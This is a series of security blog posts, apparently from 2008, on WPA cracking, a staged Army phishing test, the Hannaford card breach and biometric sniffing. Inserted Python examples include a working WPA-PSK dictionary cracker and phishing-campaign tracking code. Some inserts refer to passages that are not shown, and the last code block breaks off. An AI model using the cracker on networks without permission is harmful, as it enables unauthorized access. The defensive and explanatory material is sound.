Some of the big AV vendors like Microsoft and Symantec are not catching it. A lot of corporations use these products because they have good central management capabilities, but their detection rates seem to be awful. Their only chance is a second AV engine on the proxy that hopefully does a better job. Educating users not to follow spam (even the erotic kind) applies here as well. Also filter out all executable files by default (.exe .com .vbs .cab etc.).
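One way to implement that last piece of advice, as an added example (my own code, not from this post or any vendor): filter executables by content rather than by name alone. The script flags the extensions listed above, decoy double extensions such as photo.jpg.exe (the Kraken lure described earlier hides its .exe the same way), and any file whose bytes form a Windows PE image regardless of what it is called. The file names and byte stubs are constructed for the demo.

```python
import struct

# Extensions the post says to drop by default, plus a few equally executable ones.
BLOCKED_EXT = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js",
               ".cab", ".dll", ".cpl", ".msi", ".hta"}
# Harmless-looking extensions an attacker puts in front of the real one.
DECOY_EXT = {".jpg", ".jpeg", ".gif", ".png", ".pdf", ".doc", ".xls", ".txt"}


def extension_chain(filename):
    """'polina.jpg.exe' -> ['.jpg', '.exe'], so double extensions stay visible."""
    parts = filename.lower().rsplit("/", 1)[-1].split(".")
    return ["." + p for p in parts[1:] if p]


def is_pe_image(data):
    """True if the bytes are a Windows PE: 'MZ' DOS header whose e_lfanew
    (offset 0x3C) points at the 'PE\\0\\0' signature. Works on a partial read
    as long as both headers are inside the bytes we have."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify(filename, data):
    """Return ('block' | 'allow', [reasons]) for a downloaded file or attachment."""
    reasons = []
    exts = extension_chain(filename)
    last = exts[-1] if exts else ""
    if last in BLOCKED_EXT:
        reasons.append(f"executable extension {last}")
    if len(exts) >= 2 and exts[-2] in DECOY_EXT and last in BLOCKED_EXT:
        reasons.append(f"decoy double extension {exts[-2]}{last}")
    if is_pe_image(data):
        reasons.append("content is a PE image")
        if last not in BLOCKED_EXT:
            reasons.append(f"PE content hidden behind '{last or '(no extension)'}'")
    return ("block" if reasons else "allow"), reasons


# Constructed stubs: a minimal PE (DOS header + 'PE\0\0'), a JPEG and a PDF start.
FAKE_PE = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 60
FAKE_PDF = b"%PDF-1.4\n" + b"\x00" * 60

if __name__ == "__main__":
    for name, blob in [("iPIX-install.exe", FAKE_PE), ("polina.jpg.exe", FAKE_PE),
                       ("holiday.jpg", FAKE_PE), ("holiday.jpg", FAKE_JPEG),
                       ("report.pdf", FAKE_PDF)]:
        print(name, classify(name, blob))
```

This is a gateway or mail-filter check, not a replacement for AV: it says nothing about what a PE does, only that it is one. Its value is that it does not depend on the signature lag shown in the VirusTotal table above.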

Sunday

New version of coWPAtty 4.3 and some wireless tips



A new version of coWPAtty has been released that includes support for OS X, FreeBSD and Linux. Also introduced is the ability to perform WPA/WPA2-PSK cracking on networks using IEEE 802.11e QoS data frames. You can grab coWPAtty, check the README and get more information from the coWPAtty page on Josh's site (kudos to Josh Wright).
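What coWPAtty does under the hood, as an added example in Python (my own code, not coWPAtty's): derive the PMK from a candidate passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations), expand it to the PTK with the 802.11i PRF, and check the resulting KCK against the MIC of the captured EAPOL message 2. The "captured" handshake here is constructed from a known passphrase so the script runs offline; the MAC addresses, nonces and EAPOL frame are made up. The PMK test vector (passphrase "password", SSID "IEEE") is the one from the 802.11i standard.

```python
import hashlib
import hmac

# EAPOL-Key layout: 4 hdr + 1 descriptor type + 2 key info + 2 key length
# + 8 replay counter + 32 nonce + 16 IV + 8 RSC + 8 ID, then the 16-byte MIC.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt, which is why precomputed PMK tables (genpmk) are per-SSID,
    and the 4096 iterations are what bound any cracker's candidates per second."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """802.11i PRF-512 over 'Pairwise key expansion' and the sorted MACs and nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]      # KCK = bytes 0..15, KEK = 16..31, TK = 32..


def eapol_mic(kck, eapol):
    """MIC of an EAPOL-Key frame for key descriptor version 2 (WPA2/CCMP):
    HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes.
    (WPA/TKIP, version 1, uses HMAC-MD5 instead.)"""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, hs):
    """Dictionary attack: return the passphrase whose derived KCK reproduces the captured MIC."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:      # spec-valid passphrase lengths only
            continue
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None


def constructed_handshake(ssid, passphrase):
    """Fabricate what a sniffer would hand us (AP MAC, client MAC, both nonces,
    EAPOL message 2 and its MIC) from a known passphrase. All values are made up."""
    aa = bytes.fromhex("001122334455")             # AP (authenticator) MAC
    spa = bytes.fromhex("66778899aabb")            # client (supplicant) MAC
    anonce = hashlib.sha256(b"demo-anonce").digest()
    snonce = hashlib.sha256(b"demo-snonce").digest()
    # EAPOL v1, type 3 (Key), body length 95; descriptor 2 (RSN); key info 0x010a
    # = version 2 | pairwise | MIC present; key length 16; replay counter 1.
    frame = (b"\x01\x03\x00\x5f" + b"\x02" + b"\x01\x0a" + b"\x00\x10"
             + (1).to_bytes(8, "big") + snonce + b"\x00" * 16 + b"\x00" * 8
             + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": frame, "mic": mic}


if __name__ == "__main__":
    hs = constructed_handshake("CoffeeShop", "letmein123")
    print(crack_psk(["password", "qwerty12", "letmein123"], hs))
```

The takeaway for defenders is visible in the code: the attacker needs only one captured handshake and the SSID, the cost per guess is fixed by the 4096-iteration PBKDF2, and a common SSID plus a dictionary word is exactly what precomputed PMK tables are built for. A long random passphrase and a non-default SSID are what make the loop above hopeless.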

Josh gave an interview to NetworkWorld.com and answered a lot of questions from users. Here are some of the interesting ones:

Ed: Are standards in the works to address control level security (to prevent DoS and MIM attacks)?

Josh_Wright: There is an IEEE working group developing techniques to mitigate spoofing management frames in wireless networks (IEEE 802.11w), which will mitigate deauthenticate and disassociate flood attacks. However, this WILL NOT STOP DoS ATTACKS (sorry, I get a little excited about this topic ;). 802.11w will address two popular DoS attacks, but will not address other DoS attacks such as beacon DS Set spoofing where I tell the victims their AP is on channel 255, or triggering Michael Countermeasures, a vulnerability in TKIP, or by performing A-MSDU Block Ack DoS attacks, a vulnerability in 802.11n networks. For more information on wireless attacks, check out www.wve.org.

Alanm: Is WPA2 now considered very secure and we should feel fine using it? Or are there still attacks/vulnerabilities that it's susceptible to?

Josh_Wright: WPA2 provides strong encryption, and specifies strong authentication mechanisms such as PEAP, TTLS and EAP/TLS as well, so it is a strong strategy for organizations. The common problem with these implementations is when people misconfigure client settings for PEAP and TTLS, like I discussed with Brad Antoniewicz from Foundstone at Shmoocon a few weeks ago (slides at www.willhackforsushi.com, the video will be up at shmoocon.org shortly). If PEAP and TTLS aren't configured properly, an attacker can impersonate your RADIUS server and get access to the victim's inner authentication credentials, possibly disclosing the user's password, or giving the attacker access to the user's MS-CHAP challenge response, which is almost as good.

PatrickT: How (if at all) is 802.11n going to change the security picture?

Josh_Wright: 802.11n exposes us in a few new ways: 1. Greater distance in range for wireless AP's, conservatively at 1.5 times the range of 802.11a, liberally at four times the range of 802.11a. 2. Harder for WIDS to monitor. With 802.11n we have 20 MHz and 40 MHz channels, which makes WIDS systems spend less and less time on channel and more time channel hopping, which reduces the chances they'll be able to pick up an attack. 3. Hidden rogues. 802.11n introduces a technology for 802.11n-only devices called Greenfield mode, which makes it impossible for legacy 802.11a/b/g WIDS devices to detect the rogue AP or the user's traffic. 4. New DoS vulnerabilities. The 802.11n specification has two mechanisms for aggregating frames, which has prompted changes in how devices acknowledge transmitted frames. This has opened up DoS vulnerabilities, where an attacker can stop 802.11n devices from accepting any more frames. 5. New drivers, the complexity of 802.11n is largely felt by client devices, and new device drivers have to be written to support the specification and new hardware. With the complexity of 802.11n, this has led to new driver vulnerabilities, which can be exploited by an attacker.

Read the Full article for the rest.

PS: If you need some wifi cards or antennas, here is an excellent ebay store.

Video: Hak5 Episode 3×09 Released: PowerShell, Helix, and Yahoo Pipes



The latest video from Hak5 is out. On a side note, I also use Yahoo Pipes to power the Belgian Security Blognetwork. Here are the contents of the show:

In this episode Matt uses PowerGUI to command the new Windows PowerShell, Chris Gerling demonstrates Helix, an open source forensics toolkit, and Darren builds a simple web mashup using Yahoo Pipes. Plus haksnacks including router passwords, uninterrupted file copying, password strength auditing, and Firefox keyword shortcuts.

Oh yeah and some bloopers. A lot of bloopers. Actually, pretty much most of the episode is one ongoing blooper. We’re kicking it oldschool Hak5 style. Call it senioritis if you will :).

PS: Hak5 and trust your technolust stickers available for a limited time.

Download

Download MP4

Download Xvid

Download WMV

Watch on Youtube

Running time: 40:00

Panda Labs Jan-Mar 2008 Report published



Panda Labs has released its first quarterly report of 2008 on the current computer security threats users face in the ongoing battle against ID and personal data theft, viruses, spyware, malware and the rest.

Executive Summary:

  • At 62.16%, Trojans account for most of the malware, implementing scrambling and distribution functions.
  • Trojans that steal users' personal details through distribution channels provided by spammers continue to increase.
  • Storm Worm is still active and continues using social engineering techniques to spread massively.
  • Scrambling, encryption and packaging techniques aimed at making malware detection more difficult are on the rise.
  • Social engineering techniques that exploit the information published on social networks for identity theft are also increasing.
  • Its numerous users have made Symbian a target platform for malware creators.
One notable thing in the document is that we are seeing a return of Master Boot Record (MBR) infections, though this time not by a virus but by a rootkit.

From the article (p. 19):
Stealth techniques aimed at carrying out almost-invisible silent infections are evolving.
You can use F-Secure's standalone rootkit scanner BlackLight to scan for MBR infections.

Other topics discussed in the article are: a recap of Storm Worm over the last year, Multi-AV scanners, Web 2.0 attacks, and the latest attacks on mobile phones.

"Quarterly Report Panda Labs (January - March 2008)"

Saturday

Wargames 2: The sequel, will it suck?



Hackers wasn't exactly the most realistic hacker movie, with its fancy computer screens and lots of cool-sounding words. Wargames is a far better movie and a classic: war dialing, phone phreaking, social engineering and lock picking.

It seems Wargames 2 is going down the path of Hackers: logging on to an MMOG after finding a gaming site with Google. Hmm... let's hope the trailer doesn't give an accurate impression.

"WarGames: The Dead Code stars Matt Lanter as a computer geek named Will Farmer who engages a government super-computer named R.I.P.L.E.Y. and enters in a game of online terrorist-attack simulation (yes, instead of global thermonuclear war from the original movie). But apparently the game is actually part of a sophisticated piece of government spyware designed to find potential terrorists. Homeland Security, now believing Farmer is a terrorist, sets out to apprehend him. And the computer, of course, forgets that it’s just playing a game."
View the trailer at http://www.slashfilm.com/2008/04/01/wargames-2-movie-trailer

Friday

Social engineering put to the test. How would your employee score?



In "Social engineering pentesting against your employees", I mentioned setting up your own phishing attempt against your employees as a user awareness campaign. It also gives you a realistic figure for the percentage of employees who are susceptible to social engineering.

Apparently, the US Army did just that!

ALEXANDRIA, Va. (Apr 02, 2008) – More than 10,000 Soldiers, civilians and Family members with military e-mail addresses received an e-mail March 30 promising free tickets to area theme parks, with a link to a Web site that appeared to belong to the Family and Morale, Welfare and Recreation Command.

These e-mails were sent without the knowledge or consent of the Family and Morale, Welfare and Recreation Command (FMWRC) or installation MWR offices. These e-mails were "phishing" emails developed by the Army Computer Emergency Response Team (ACERT) in a Global Computer Network Defense exercise, Bulwark Defender 08 (BD08) to test the defensive posture of the Army LandWarNet.

FMWRC officials were not alerted to the exercise in advance because the unit "limits the number of trusted agents" in phishing exercises of this type, according to ACERT officials.
...
The e-mail and Web site created by ACERT were convincing enough to entice more than 3,000 people to click through, in part because of the use of the MWR web graphics and logo, and in part because patrons are used to receiving similar messages.

"We apologize for any inconvenience or false hope these e-mails may have caused. As users of Army network and information systems, you play an integral role in the Information Assurance and Network Security posture for the Army. As you know, phishing emails are a common method used by Hackers to infiltrate Army networks and systems. Your ability to identify and respond to phishing attempts is paramount to the defense of critical information systems that make up the Army LandWarNet. Soon, you will receive another e-mail from the ACERT that will provide education on how to identify "phishing" attempts as illegitimate.

We appreciate your participation in this exercise. Everyone plays a part in the security of the Army networks and systems. It is important for everyone to know the MWR brand can be trusted, so please forward this email to anyone you may have shared the original "phishing" email with." (Source: www.armyfamiliesonline.org)
Hmmm... 3,000 out of 10,000 targets. That is 30%! If you do a similar exercise, get permission from executive management and work together with HR and Legal. I would like to see more people trying this exercise.
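If you run such an exercise yourself, the two things you need from the tooling are per-recipient links that cannot be guessed or forged (so a fabricated or mistyped link does not pollute the numbers) and a tally that counts each recipient once, however often they click. As an added example, not from the Army exercise or from the earlier post, here is that in Python; the recipients, secret and click log are constructed.

```python
import hashlib
import hmac
import re
from urllib.parse import urlsplit

# Constructed data for the demo; use a fresh secret per campaign in real life.
CAMPAIGN_SECRET = b"rotate-me-per-campaign"
BASE_URL = "https://mwr-tickets.example/claim"
CLICK_LINE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) GET \S*\?t=(?P<tok>[0-9a-f]{20})")


def token_for(secret, recipient):
    """HMAC-SHA256 of the recipient address, truncated; unguessable without the secret."""
    return hmac.new(secret, recipient.lower().encode(), hashlib.sha256).hexdigest()[:20]


def issue_campaign(secret, recipients, base_url):
    """Return {token: recipient} to keep server-side and {recipient: url} to mail out.
    Only the token goes into the URL, so the link itself leaks no address."""
    issued = {token_for(secret, r): r for r in recipients}
    urls = {r: f"{base_url}?t={t}" for t, r in issued.items()}
    return issued, urls


def tally_clicks(issued, log_lines):
    """Count distinct recipients whose valid token was clicked; reject unknown tokens."""
    clicked, rejected = set(), 0
    for line in log_lines:
        m = CLICK_LINE.match(line)
        if not m:
            continue
        recipient = issued.get(m.group("tok"))
        if recipient is None:
            rejected += 1            # forged, mistyped or expired token
        else:
            clicked.add(recipient)   # a second click by the same person counts once
    total = len(set(issued.values()))
    return {"recipients": total, "clicked": len(clicked),
            "rate": len(clicked) / total if total else 0.0, "rejected": rejected}


def demo_log(urls):
    """Constructed web-server lines: user1 clicks twice, user2 once, user4's link is
    clicked from another address (forwarded; still counts for user4, who acted on
    the mail), one forged token, and one unrelated request."""
    def line(ts, ip, url):
        u = urlsplit(url)
        return f"{ts} {ip} GET {u.path}?{u.query} 200"
    return [
        line("2008-03-30T09:01:00", "198.51.100.11", urls["user1@example.mil"]),
        line("2008-03-30T09:02:30", "198.51.100.11", urls["user1@example.mil"]),
        line("2008-03-30T09:05:12", "198.51.100.12", urls["user2@example.mil"]),
        line("2008-03-30T10:40:07", "198.51.100.99", urls["user4@example.mil"]),
        "2008-03-30T11:00:00 198.51.100.50 GET /claim?t=00000000000000000000 200",
        "2008-03-30T11:00:05 198.51.100.50 GET /favicon.ico 200",
    ]


if __name__ == "__main__":
    recipients = [f"user{i}@example.mil" for i in range(1, 11)]
    issued, urls = issue_campaign(CAMPAIGN_SECRET, recipients, BASE_URL)
    print(tally_clicks(issued, demo_log(urls)))
```

The token map is the sensitive artifact of the exercise: it ties names to behaviour, which is exactly why HR and Legal need to be involved before the first mail goes out.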


Patch mania, it's not just Patch Tuesday



Time to get patching again. It's a nice bunch, with a lot of browser-related bugs. Perfect for those drive-by downloads.

Microsoft released its advance notification for this upcoming Patch Tuesday. It looks like system administrators have their work cut out for them: 8 security bulletins (5 critical and 3 important), as well as some other non-security patches.

More information is available at http://www.microsoft.com/technet/security/bulletin/ms08-apr.mspx.

Then it's Apple's turn again with QuickTime 7.4.5. Apple has released QuickTime 7.4.5 to address multiple vulnerabilities that may allow a remote attacker to execute arbitrary code or obtain sensitive information.

More information is available in Apple knowledge base article HT1241, and you are advised to upgrade to QuickTime 7.4.5.

Also Opera released a new version of their browser (9.27) that fixes two remotely exploitable vulnerabilities (http://www.opera.com/support/search/view/881/ and http://www.opera.com/support/search/view/882/).

The update can be downloaded from http://www.opera.com/download/.

A severe security vulnerability exists in RealNetworks' RealPlayer software.

The flaw can give an attacker access to the user's PC: a specially crafted RealMedia file triggers a buffer overflow in RealPlayer. So it is not a remote attack on a listening service, but if you open a RealMedia file from a dubious website or download one from the Net, it may contain the alterations that exploit this hole. An exploit for this vulnerability was posted on milw0rm on the 1st of April and is actively being used.

RealNetworks has issued a patch for the problem. Patch can be downloaded from here:
http://www.service.real.com/help/faq/security/040123_player/EN/

Last but not least, Adobe will release an update for Flash in the coming days. The vulnerability was exposed during the PWN to OWN contest in which Vista was hacked: a Flash vulnerability, combined with Java, was the downfall of Vista.

So keep an eye on the Adobe advisories. You can use Secunia PSI to detect any other system components that need patching.


Security videos from Microsoft and VOIPshield



The first videos are produced by Microsoft. These "How do I?" videos are tutorials on specific issues such as "How do I fix SQL injection?" or "How do I prevent cross-site request forgery?". I haven't watched them myself (yet), so this is also a reference for myself. Most of them are focused on .NET technology.

The following video is from VoIPshield, who recently gained some press by announcing the discovery of over 100 security vulnerabilities in systems from Avaya, Cisco and Nortel.

VoIPshield has disclosed all the vulnerabilities to the vendors and has made 44 of the vulnerabilities available at www.voipshield.com/research

So here is the video from VOIPshield:



Bonus: Study: VOIP is in need of security (Source: Darkreading)

A followup on the Hannaford case: What happened? (UPDATED)



Shortly after the breach the discussions started, and the PCI certification came under fire. The Hannaford breach was not as severe as the TJX incident, but unlike TJX, Hannaford WAS PCI certified. So why did the certification not protect them against hackers?

PCI can give many merchants “a false sense of security,” says John Pironti, Chief Information Risk Strategist at Getronics. He says the bad guys have deep knowledge about how to circumvent security controls specified by PCI, “and are well on the way to working out the others.”

In fact, Pironti says that by stating it is PCI compliant, a merchant can actually give data thieves “a roadmap of the controls which you have in place which they can then circumvent.” (Source: Zero day threat.)

Securosis has his own points and suggestions for fixing the system:

  • PCI-DSS was established to transfer risk from the credit card companies to the retailers and processors. There is a lot the credit card companies could do to reduce risk on the processing side, but they have instead chosen to push it onto the retailers and processors.
  • Going back to CardSystems, a large majority of major breaches involve companies that were PCI compliant, including (probably) Hannaford. TJX is an open question. In many cases, the companies involved were certified but found to be non-compliant after the breach, which indicates a severe breakdown in the certification process
  • No ASV has been dropped from PCI, even after certifying non-compliant companies. There is no accountability in the system.
  • ASVs are allowed to offer services to the companies they certify, which is a built-in conflict of interest. They should be held to the same standard as financial auditors where the audit function and compliance assistance/services/consulting cannot come from the same auditor.
  • Many auditors certify compensating controls that are clearly ineffective.
  • Due to lack of accountability in the system, companies push ASVs for the lowest price possible to achieve “compliance”. This price pressure leads to cheap certification, and the approval of inadequate controls mentioned in point 5. PCI-DSS is moving to a checkbox that doesn’t necessarily reflect any level of security, and the credit card companies are okay with that since they can just later find the company in violation after a breach, yank certification, levy fines, and push all costs to the retailer.

So what actually happened at Hannaford?

The data breach at Hannaford, the US grocery chain, which enabled the theft of info on more than 4.2 million credit card accounts was caused by a sophisticated piece of malware that attackers installed in all the company's retail outlets.

Installed on more than 300 servers in at least six states, the malware was able to intercept credit card data while customers paid for purchases using plastic and transmit the information overseas, The Boston Globe reports. The rogue software was installed on servers in close to 300 different locations, though the company isn't saying how it got there.

The malware lifted "track 2" data stored on the magnetic strip of customers' cards as customers used them at point-of-sale machines. The data includes the card number and expiration date, but not the customer's name. The malware stored records of the purchases in batches and periodically transmitted them to an unidentified offshore internet service provider, according to the company. (Source: TheRegister)
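The quote describes exactly what the malware harvested: track 2 data, which is PAN, expiry, service code and discretionary data, with no cardholder name. Track 2 has a rigid layout, so it can be matched in memory dumps, in the batch files such malware leaves behind, or in outbound traffic. The following is an added example of that check, my own code rather than anything from Hannaford, The Register or a vendor; the batch it scans is constructed from well-known published test card numbers.

```python
import re

# Track 2: ';' PAN(13-19 digits) '=' YYMM service-code(3) discretionary-data '?'
TRACK2 = re.compile(r";(?P<pan>\d{13,19})=(?P<exp>\d{4})(?P<svc>\d{3})(?P<disc>\d{0,20})\?", re.ASCII)


def luhn_ok(digits):
    """Luhn check on the PAN; weeds out most random digit runs that happen
    to be wrapped in ';...=...?'."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep the BIN (first 6) and last 4, the form PCI permits for display."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track2(blob):
    """Return (masked PAN, YYMM, service code) for each Luhn-valid track 2 record
    in a text or binary blob. The output never contains a full PAN, so the
    detector's own logs do not become cardholder data."""
    text = blob.decode("latin-1") if isinstance(blob, bytes) else blob
    hits = []
    for m in TRACK2.finditer(text):
        if luhn_ok(m.group("pan")):
            hits.append((mask_pan(m.group("pan")), m.group("exp"), m.group("svc")))
    return hits


def scan_lines(lines):
    """Per-line report, the way you would run this over a batch file or a
    reassembled outbound flow: (line number, number of cards) for lines with hits."""
    report = []
    for n, line in enumerate(lines, 1):
        hits = find_track2(line)
        if hits:
            report.append((n, len(hits)))
    return report


# Constructed batch in the style the malware is described as producing. The PANs
# are published test numbers (Visa 4111..., Mastercard 5500...); the third record
# has a one-digit typo so its Luhn check fails and it must NOT be reported.
CONSTRUCTED_BATCH = (
    b"\x00\x01;4111111111111111=1012101123456789?\x00\x00"
    b"POS-TERM-17;5500000000000004=0911201000000001?\x00"
    b"noise ;4111111111111112=1012101123456789? more noise\n"
)

if __name__ == "__main__":
    for hit in find_track2(CONSTRUCTED_BATCH):
        print(hit)
```

Run against POS server memory or the egress of the card-processing segment, a hit of this shape outside the authorisation path is precisely the "authorized insider changed behaviour" signal the NetworkWorld piece quoted below asks for, and it is a far cheaper control than a PCI audit.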

So why not share this information? It would be of tremendous help to similar PCI-certified retailers. I saw an interesting quote from Gartner last year that I recently used in a presentation:

By the end of 2007, 75 percent of enterprises will be infected with undetected, financially motivated, targeted malware that evaded their traditional perimeter and host defences. The threat environment is changing — financially motivated, targeted attacks are increasing, and automated malware-generation kits allow simple creation of thousands of variants quickly — but our security processes and technologies haven't kept up. (Zdnet.co.uk)

UPDATED (03/04/2008): Some more details have appeared here and there

Let’s look more closely at the methodology used in the Hannaford case. There are various news reports that depict the management of Hannaford as confused and shocked at the “unique” use of Trojan Horse malware to steal information from them. Trojan software is malware that is disguised as something else as it is installed on a remote computer. It can then be used to steal files, record keystrokes, even take over the computer. Trojan Horses are the simplest way to infiltrate a network. They arrive as email attachments, can masquerade as PowerPoint presentations, and they can be easily modified to avoid detection by any signature based AV program. Trojans such as the Storm Worm are said to infect hundreds of millions of machines on the Internet. The Haephrati Trojan was used to steal hundreds of documents from dozens of companies in Israel. A Trojan Horse was implicated in the CardSystems International case. Hardware and software Trojans were used in the Sumitomo Bank heist. And the Chinese Red Army has infamously used Trojan Horses to blanket the world in the most massive case of industrial espionage in history. Any reader of my blog knows of the dangers of custom Trojans.

Lessons learned from the Hannaford case? That retail organizations are being targeted. This attack appears to be almost complete and most likely emanating from overseas. Being a target for attacks means a different level of security preparedness is required. Firewalls plus AV is not enough. Encryption is required - at rest and in motion. Behavior analysis and alerting systems have to be in place. Not IDS, but something that can detect when authorized insiders have changed their behavior. Investment is required. (Source: networkworld.com)

;LOGIN: The Usenix magazine April 2008, Volume 33, Number 2



The USENIX journal ;login: has a new issue.

http://www.usenix.org/publications/login/2008-04/index.html

Most of the articles are only accessible to USENIX members, but the following are free for everyone:

OPINION
Musings by Rik Farrow

SYSADMIN
IPv6: It's Time to Make the Move by Mark Kosters and Megan Kruse

BOOK REVIEWS
Book Reviews by Elizabeth Zwicky et al.

USENIX NOTES

Open Public Access to All USENIX Conference Proceedings

Back from London



I just got back from 3 days in London, where I visited businesscontinuityexpo.co.uk. It was an interesting experience. Still, I am looking forward to the next CCC congress: it will be 25C3 (the 25th Chaos Communication Congress) and I really expect a special edition.

The coolest thing was that on the evening of day 2 there was a DC4420 (DEF CON London) meeting with Jeff Moss as a special guest. Of course I attended. I learned some interesting things and met some cool people. Since we don't have these kinds of gatherings in Belgium, I might consider hopping on the Eurostar now and then. Who knows...

What did I learn about business continuity? Virtualization is a highly flexible platform to use in case of a disaster (live migration etc.), a pandemic flu (not just crashing servers) can be a threat to the organization, and there is the BS 25999 standard. I also got a lot of free magazines, brochures and other information. Once I get the time to go through them, I'll post some more notes about BCP and DR.

But for now, I have some backlog on reading my feed and blogging.

Wednesday

Fun: Revolutionary breakthrough in antivirus software



Just kidding. But I did want to mention this April 1st joke from Sophos with their RAPIL product. In our job, we need some humour now and then to make it through the day.

An exciting day in SophosLabs. After long and arduous efforts, we announce our new beta technology offering to defeat the hackers, which we are currently referring to as RAPIL (Recognition and Analysis of Potentially Intruding Lifeforms).

As the following video demonstrates, RAPIL is already producing impressive results:



Apparently, there is even a Flickr photo group for RAPIL beta testers. :-)

England might also ban security tools and research



Nathan McFeters has the details on his blog about this year's changes to the Computer Misuse Act in England. Give it a quick read before moving on. Of course, it's the same story as the ban on security tools in Germany. A lot of the tools that blackhats use are the same tools that whitehats use to test their networks. Blackhats are already working in the illegal zone. Making a new or stricter law won't change anything for them, but it will limit our defenses, as from that point on we cannot use or develop those tools without doing something illegal.
So, have lawmakers gone bonkers???? Are they too much out of touch with the real digital world? Let's hope the Belgian lawmakers will not start thinking: "Germany is doing it, and England is doing it, so we must also start doing this!!!"

pdp aka The Architect from Gnucitizen has also given his opinion (which I find brilliant):

Now, what really makes me worried is that this act won't fix anything. In fact, it will make the situation far worse. And Britain is the next example to follow Germany, which I am sure will be followed by The United States of America very soon, as it seems that they are the initiators of the recent anti-hacker craze.

I am not a politician and I cannot fight with words because that will be pointless, as many people before me have done it and they have failed, but I can lead with examples from my experience. One thing that I have learned, helping far too many organizations to put their security perimeter up a notch, is that security through obscurity does not work.

The law cannot prevent the distribution of information. Have we got rid of the piracy problem? No! In fact, the piracy industry is now far better off than in the past. You can probably notice that every movie or TV show is available online without the need to access BitTorrent or any other distribution network. The music industry is much the same. As a result, bands such as Radiohead and Scissor Sisters, I believe, have offered their music for free because free does make economic sense.

In a similar way, the Computer Misuse Act will make the availability of exploits far easier than now. People won't stop publishing security information. They will switch the medium. Instead of posting info on personal blogs, they will do that on Wikipedia or any other site that allows anonymous contributions. The distribution of info on the Web is a breeze nowadays with the existence of things such as RSS, ATOM and aggregation engines. The reach of information and availability of exploits, and the fact that there are no opinion makers to shape the thinking of younger generations of information security experts, will make the situation unbearable, not only for those who don't deserve the punishment but also for companies and organizations who cannot protect themselves.

Security is not a destination. It is a process. We cannot train a monkey to run a scanner. We need people who understand the risk to show us which of our assets are at stake. With that law in place we are actually reverting what we have already built with far too many sacrifices. (Source: Gnucitizen)


More on biometrics: biologger can sniff fingerprints



In "Let's make huge databases of fingerprints or maybe not", we had a critical look at the use of fingerprints for authentication. Together with the Chaos Computer Club publishing the fingerprints of a high-ranking German official, it was becoming a hot topic.
One of the presentations from Black Hat Europe 2008 that I hadn't looked at was also quite relevant, as some readers pointed out:

If you think biometric scans are necessarily secure, think again: A European researcher has built a biometric keylogger that can capture fingerprint or other scans.

The so-called Biologger intercepts biometric data sent between a biometric scanner and its processing server, says Matt Lewis, a researcher with Information Risk Management, who demonstrated the tool and released proof-of-concept source code for it last week at Black Hat Europe in Amsterdam.

“It is the biometric equivalent of a traditional keylogger,” Lewis says. Biologger easily captures the biometric traffic, which then can be taken offline for the attacker to analyze and to find ways to subvert the biometric system, he says, adding that an attacker could use that information to recreate a user’s raw biometric image. (Source: Darkreading)

So this gives us even more food for thought. I still find the whole concept too 1984.
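The Darkreading piece only says that Biologger captures the traffic between scanner and server; what it does not spell out is why that capture is useful to an attacker. If the scanner simply ships the template over the wire, the attacker does not even need to recreate the finger: replaying the captured bytes is enough. The toy exchange below, an added example that is not code from the original post nor from Biologger, shows the replay against an unauthenticated link and the same attempt against a link where the server issues a nonce and the scanner authenticates (nonce, template) with an HMAC under a per-device key. The device key, the server class and the "template" bytes are constructed for illustration.

```python
"""Added example (not from the original post, not Biologger): why a captured
biometric message can be replayed over an unauthenticated scanner-to-server
link, and how a server nonce plus a per-device HMAC stops that replay.
All keys, names and the template bytes are constructed assumptions."""
import hashlib
import hmac
import os

# Assumption: a secret shared between this scanner and the server at enrolment.
DEVICE_KEY = b"constructed-per-device-secret"


class Server:
    def __init__(self, enrolled_template):
        self.enrolled = enrolled_template
        self.issued = set()   # nonces handed out and not yet consumed
        self.used = set()     # nonces already accepted (replay check)

    def challenge(self):
        nonce = os.urandom(16)
        self.issued.add(nonce)
        return nonce

    def verify_plain(self, template):
        """Legacy mode: whatever arrives on the wire is compared to the
        enrolled template. Nothing binds the message to this session."""
        return hmac.compare_digest(template, self.enrolled)

    def verify_auth(self, nonce, template, tag):
        """Authenticated mode: the nonce must be one we issued and not yet
        used, and the tag must cover (nonce || template) under DEVICE_KEY."""
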